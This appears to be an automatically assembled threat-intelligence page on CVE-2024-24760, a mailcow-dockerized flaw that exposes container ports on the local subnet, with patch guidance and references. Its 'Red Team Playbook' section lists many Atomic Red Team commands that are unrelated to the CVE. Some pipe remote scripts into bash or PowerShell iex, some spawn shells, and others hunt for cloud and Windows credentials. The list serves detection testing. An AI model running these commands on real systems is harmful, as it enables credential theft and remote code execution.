CVE-2024-24760
Overview
This vulnerability is a network access control bypass affecting mailcow-dockerized's container networking configuration. The root cause lies in insufficient filtering of network packets on Docker container ports bound to localhost (127.0.0.1), allowing external hosts on the same subnet to reach these ports. The affected component is the bridged Docker network interface (br-mailcow) used to link mailcow containers, where iptables/nftables rules do not adequately restrict access based on input and output interfaces.
Vulnerability Description
mailcow is a dockerized email package, with multiple containers linked in one bridged network. A security vulnerability has been identified in mailcow affecting versions < 2024-01c. This vulnerability potentially allows attackers on the same subnet to connect to exposed ports of a Docker container, even when the port is bound to 127.0.0.1. The vulnerability has been addressed by implementing additional iptables/nftables rules. These rules drop packets for Docker containers on ports 3306, 6379, 8983, and 12345, where the input interface is not `br-mailcow` and the output interface is `br-mailcow`.
Impact
An attacker with network access to the same subnet can connect to sensitive Docker container ports that are intended to be accessible only locally within mailcow-dockerized. This enables unauthorized access to internal services such as databases (port 3306), Redis (6379), Solr (8983), and custom services (12345), potentially leading to data exposure, service manipulation, or lateral movement within the network. The attack requires no user interaction but does require subnet-level access. The CVSS vector indicates low attack complexity and privileges required (PR:L), reflecting the ease of exploitation once network access is obtained.
Solution
Users should upgrade mailcow-dockerized to version 2024-01c or later, where the vendor implemented additional iptables/nftables rules to restrict access to critical container ports based on network interfaces. The vendor advisory (https://github.com/mailcow/mailcow-dockerized/security/advisories/GHSA-gmpj-5xcm-xxx6) and the related patch commit (087481ac12bfa5dd715f3630f0b1697be94f7e88) provide detailed instructions. Applying these updates ensures that packets entering from interfaces other than br-mailcow are dropped when targeting protected ports, mitigating unauthorized subnet access.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A significant security vulnerability has been identified in the mailcow email package, which operates within a Dockerized environment. This flaw arises from the misconfiguration of network interfaces, allowing unauthorized access to exposed ports of Docker containers, even when these ports are intended to be restricted to localhost (127.0.0.1). The issue is particularly concerning because it affects all versions prior to 2024-01c, leaving numerous deployments vulnerable to exploitation. The core of the problem lies in the bridging of network interfaces, where containers are linked in a way that permits traffic from the same subnet to bypass intended access controls.
Attackers on the same subnet can exploit this vulnerability by connecting to the exposed ports of the affected Docker containers. Specifically, ports such as 3306 (MySQL), 6379 (Redis), 8983 (Solr), and 12345 (various services) are at risk. An attacker could leverage this access to perform unauthorized actions, such as data exfiltration, service disruption, or even remote code execution, depending on the services running within the containers. The potential for lateral movement within the network increases significantly, as an attacker could use compromised services to gain further access to sensitive data or other systems within the organization.
The real-world impact of this vulnerability can be severe, particularly for organizations that rely on mailcow for email services. The business risks associated with such a breach include data loss, reputational damage, and potential regulatory penalties, especially if sensitive information is exposed. The financial implications can be substantial, ranging from costs associated with incident response and recovery to long-term impacts on customer trust and brand loyalty. Furthermore, organizations may face legal ramifications if they fail to protect user data adequately, particularly in jurisdictions with stringent data protection laws.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. First, it is crucial to upgrade to the latest version of mailcow, which includes the necessary iptables/nftables rules to restrict access to the exposed ports. These rules effectively drop packets for Docker containers on specified ports when the input interface is not `br-mailcow` and the output interface is `br-mailcow`. Additionally, organizations should conduct regular network scans to identify any unauthorized access attempts and monitor logs for unusual activity. Employing network segmentation can further reduce the attack surface, ensuring that sensitive services are isolated from less secure environments.
In conclusion, the vulnerability within mailcow presents a significant threat to organizations utilizing this email package in a Dockerized environment. The potential for exploitation by attackers on the same subnet highlights the importance of proper network configuration and security practices. By staying informed about vulnerabilities, promptly applying patches, and implementing robust detection and mitigation strategies, organizations can significantly reduce their risk exposure and protect their critical assets from unauthorized access and potential compromise.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Mailcow | Mailcow\ | _dockerized |
cpe:2.3:a:mailcow:mailcow\:_dockerized:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
killerbees19/CVE-2024-24760
mailcow: Docker Container Exposure to Local Network
|
killerbees19 | 0 | 0 | 2024-03-04 | View |
Threat Feed
1 eventsProof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-219 | XML Routing Detour Attacks |
30%
|
High | Medium |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-24760 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/mailcow/mailcow-dockerized/security/advisories/GHSA-gmpj-5xcm-xxx6 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/mailcow/mailcow-dockerized/commit/087481ac12bfa5dd715f3630f0b1697be94f7e88 |